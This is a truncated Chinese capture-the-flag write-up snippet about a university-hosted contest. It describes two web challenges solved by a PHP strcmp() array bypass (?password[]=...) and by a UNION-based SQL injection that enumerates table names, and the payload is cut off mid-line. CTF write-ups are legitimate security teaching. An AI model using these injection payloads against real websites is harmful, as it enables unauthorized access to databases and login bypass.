由中国计量大学现代科技学院主办的比赛。 easyweb 源码忘了脱下来，大概考察PHP strcmp()函数，直接数组绕过 ?password[]=shit 成绩单 白给题，Union注入无任何过滤，上来直接一血 id=-1' union select 1,group_concat(table_name),3,4 from informa…